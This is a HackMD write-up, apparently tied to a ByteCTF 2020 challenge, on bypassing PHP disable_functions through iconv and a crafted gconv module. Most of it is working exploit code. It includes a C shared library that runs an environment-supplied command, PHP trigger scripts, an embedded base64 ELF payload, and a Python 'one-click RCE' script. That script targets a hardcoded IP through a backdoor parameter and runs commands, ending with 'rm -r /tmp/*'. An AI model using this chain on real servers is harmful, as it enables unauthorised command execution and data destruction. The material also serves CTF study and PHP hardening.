# bypass diable_function with iconv ## env * default `ubuntu18.04` docker images with php installed. * arbitary php code execution while `putenv()` is not disabled. * docker environment: https://github.com/baiyecha404/CTFWEBchallenge/blob/master/bytectf2020/wallbreaker2020 ## exploit upload gconv module configuration file to `/tmp` `gconv-modules` ``` module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2 module INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2 ``` upload dynamic library `payload.so` to `/tmp` `payload.c -> payload.so` ```bash gcc payload.c -o payload.so -shared -fPIC ``` payload.c ```c #include <stdio.h> #include <stdlib.h> void gconv() {} void gconv_init() { const char* cmdline = getenv("EVIL_CMDLINE"); system(cmdline); exit(0); } ``` execute exp.php ```php <?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(id) > /tmp/res"); iconv("payload", "UTF-8", "whatever"); ``` Done ## alternatives when `iconv()` is also disabled, you can use php filter to bypass it. simply replace `iconv` with following code can get the job done ```php $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.payload.utf-8'); fwrite($fp, "byc_404"); fclose($fp); ``` ## script "one-click" rce ```python # coding: utf-8 # -**- author: byc_404 -**- import requests from base64 import b64encode as b64 url = 'http://120.27.246.202:8200/' payload_so = """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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAYAAAAAAABwBgAAAAAAAAEAAAAAAAAAfwAAAAAAAAAMAAAAAAAAAHgFAAAAAAAADQAAAAAAAADwBgAAAAAAABkAAAAAAAAAEA4gAAAAAAAbAAAAAAAAAAgAAAAAAAAAGgAAAAAAAAAYDiAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAPABAAAAAAAABQAAAAAAAACYAwAAAAAAAAYAAAAAAAAAMAIAAAAAAAAKAAAAAAAAAK0AAAAAAAAACwAAAAAAAAAYAAAAAAAAAAMAAAAAAAAAABAgAAAAAAACAAAAAAAAAEgAAAAAAAAAFAAAAAAAAAAHAAAAAAAAABcAAAAAAAAAMAUAAAAAAAAHAAAAAAAAAIgEAAAAAAAACAAAAAAAAACoAAAAAAAAAAkAAAAAAAAAGAAAAAAAAAD+//9vAAAAAGgEAAAAAAAA////bwAAAAABAAAAAAAAAPD//28AAAAARgQAAAAAAAD5//9vAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAKYFAAAAAAAAtgUAAAAAAADGBQAAAAAAADAQIAAAAAAAR0NDOiAoVWJ1bnR1IDcuNS4wLTN1YnVudHUxfjE4LjA0KSA3LjUuMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwAwAgAAAAAAAAAAAAAAAAAAAAAAAAMABACYAwAAAAAAAAAAAAAAAAAAAAAAAAMABQBGBAAAAAAAAAAAAAAAAAAAAAAAAAMABgBoBAAAAAAAAAAAAAAAAAAAAAAAAAMABwCIBAAAAAAAAAAAAAAAAAAAAAAAAAMACAAwBQAAAAAAAAAAAAAAAAAAAAAAAAMACQB4BQAAAAAAAAAAAAAAAAAAAAAAAAMACgCQBQAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBQAAAAAAAAAAAAAAAAAAAAAAAAMADADgBQAAAAAAAAAAAAAAAAAAAAAAAAMADQDwBgAAAAAAAAAAAAAAAAAAAAAAAAMADgD5BgAAAAAAAAAAAAAAAAAAAAAAAAMADwAIBwAAAAAAAAAAAAAAAAAAAAAAAAMAEAA4BwAAAAAAAAAAAAAAAAAAAAAAAAMAEQAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAEgAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAgDiAAAAAAAAAAAAAAAAAAAAAAAAMAFADgDyAAAAAAAAAAAAAAAAAAAAAAAAMAFQAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFgAwECAAAAAAAAAAAAAAAAAAAAAAAAMAFwA4ECAAAAAAAAAAAAAAAAAAAAAAAAMAGAAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAIADADgBQAAAAAAAAAAAAAAAAAADgAAAAIADAAgBgAAAAAAAAAAAAAAAAAAIQAAAAIADABwBgAAAAAAAAAAAAAAAAAANwAAAAEAFwA4ECAAAAAAAAEAAAAAAAAARgAAAAEAEgAYDiAAAAAAAAAAAAAAAAAAbQAAAAIADACwBgAAAAAAAAAAAAAAAAAAeQAAAAEAEQAQDiAAAAAAAAAAAAAAAAAAmAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAogAAAAEAEADMBwAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAsAAAAAEAFgAwECAAAAAAAAAAAAAAAAAAvQAAAAEAEwAgDiAAAAAAAAAAAAAAAAAAxgAAAAAADwAIBwAAAAAAAAAAAAAAAAAA2QAAAAEAFgA4ECAAAAAAAAAAAAAAAAAA5QAAAAEAFQAAECAAAAAAAAAAAAAAAAAA+wAAABIAAAAAAAAAAAAAAAAAAAAAAAAADwEAACAAAAAAAAAAAAAAAAAAAAAAAAAAKwEAABAAFgA4ECAAAAAAAAAAAAAAAAAAMgEAABIADQDwBgAAAAAAAAAAAAAAAAAAOAEAABIAAAAAAAAAAAAAAAAAAAAAAAAATAEAACAAAAAAAAAAAAAAAAAAAAAAAAAAWwEAABIADAC6BgAAAAAAAAcAAAAAAAAAYQEAABAAFwBAECAAAAAAAAAAAAAAAAAAZgEAABAAFwA4ECAAAAAAAAAAAAAAAAAAcgEAABIAAAAAAAAAAAAAAAAAAAAAAAAAhAEAACAAAAAAAAAAAAAAAAAAAAAAAAAAngEAACIAAAAAAAAAAAAAAAAAAAAAAAAAvwEAABIACQB4BQAAAAAAAAAAAAAAAAAAugEAABIADADBBgAAAAAAAC4AAAAAAAAAAGNydHN0dWZmLmMAZGVyZWdpc3Rlcl90bV9jbG9uZXMAX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC43Njk4AF9fZG9fZ2xvYmFsX2R0b3JzX2F1eF9maW5pX2FycmF5X2VudHJ5AGZyYW1lX2R1bW15AF9fZnJhbWVfZHVtbXlfaW5pdF9hcnJheV9lbnRyeQBwYXlsb2FkLmMAX19GUkFNRV9FTkRfXwBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBnZXRlbnZAQEdMSUJDXzIuMi41AF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBfZWRhdGEAX2ZpbmkAc3lzdGVtQEBHTElCQ18yLjIuNQBfX2dtb25fc3RhcnRfXwBnY29udgBfZW5kAF9fYnNzX3N0YXJ0AGV4aXRAQEdMSUJDXzIuMi41AF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AGdjb252X2luaXQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALm5vdGUuZ251LmJ1aWxkLWlkAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAAEAAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADACAAAAAAAAMAIAAAAAAABoAQAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAACYAwAAAAAAAJgDAAAAAAAArQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAARgQAAAAAAABGBAAAAAAAAB4AAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAAGgEAAAAAAAAaAQAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAACIBAAAAAAAAIgEAAAAAAAAqAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAMAUAAAAAAAAwBQAAAAAAAEgAAAAAAAAAAwAAABUAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAAHgFAAAAAAAAeAUAAAAAAAAXAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAACQBQAAAAAAAJAFAAAAAAAAQAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAA0AUAAAAAAADQBQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAOAFAAAAAAAA4AUAAAAAAAAPAQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAADwBgAAAAAAAPAGAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAA+QYAAAAAAAD5BgAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAAgHAAAAAAAACAcAAAAAAAAsAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAAA4BwAAAAAAADgHAAAAAAAAmAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAAEA4gAAAAAAAQDgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAvwAAAA8AAAADAAAAAAAAABgOIAAAAAAAGA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAMsAAAAGAAAAAwAAAAAAAAAgDiAAAAAAACAOAAAAAAAAwAEAAAAAAAAEAAAAAAAAAAgAAAAAAAAAEAAAAAAAAACCAAAAAQAAAAMAAAAAAAAA4A8gAAAAAADgDwAAAAAAACAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA1AAAAAEAAAADAAAAAAAAAAAQIAAAAAAAABAAAAAAAAAwAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAN0AAAABAAAAAwAAAAAAAAAwECAAAAAAADAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADjAAAACAAAAAMAAAAAAAAAOBAgAAAAAAA4EAAAAAAAAAgAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA6AAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAOBAAAAAAAAApAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAGgQAAAAAAAAQAUAAAAAAAAaAAAAKgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACoFQAAAAAAAMUBAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAbRcAAAAAAADxAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==""" gconv_modules="""module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2\nmodule INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2""" exp="""<?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(%s) > /tmp/res"); iconv("payload", "UTF-8", "byc_404"); """ # use it when iconv() is disabled exp_alternatives ="""<?php putenv("GCONV_PATH=/tmp"); putenv("EVIL_CMDLINE=echo $(%s) > /tmp/res"); $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.payload.utf-8'); fwrite($fp, "byc_404"); fclose($fp); """ def upload_so(): r = requests.post(url, data={'backdoor': """file_put_contents('/tmp/payload.so',base64_decode('%s'));echo 'OK';""" % payload_so}) if 'OK' not in r.text: return "[-] Upload payload.so Failed" return "[+] Successfully upload payload.so" def upload_gconv_modules(): r = requests.post(url, data={'backdoor': "file_put_contents('/tmp/gconv-modules','%s');echo 'OK';" % gconv_modules}) if 'OK' not in r.text: return "[-] Upload gconv_modules Failed" return "[+] Successfully upload gconv-modules" def rce(cmd): r = requests.post(url, data={'backdoor': "file_put_contents('/tmp/exp.php',base64_decode('%s'));echo 'OK';" % b64((exp_alternatives % cmd).encode()).decode()}) if 'OK' not in r.text: return "[-] Upload exp.php Failed" print("[+] Successfully upload exp.php") try: requests.post(url, data={"backdoor": "include('/tmp/exp.php');"}) except: pass r = requests.post(url, data={"backdoor": "include('/tmp/res');unlink('/tmp/res');"}) return r.text def main(): print(upload_so()) print(upload_gconv_modules()) print(rce('id'),rce('rm -r /tmp/*')) if __name__ == '__main__': main() ``` ## references https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80 https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Last changed by  
byc_404
1196
Published on HackMD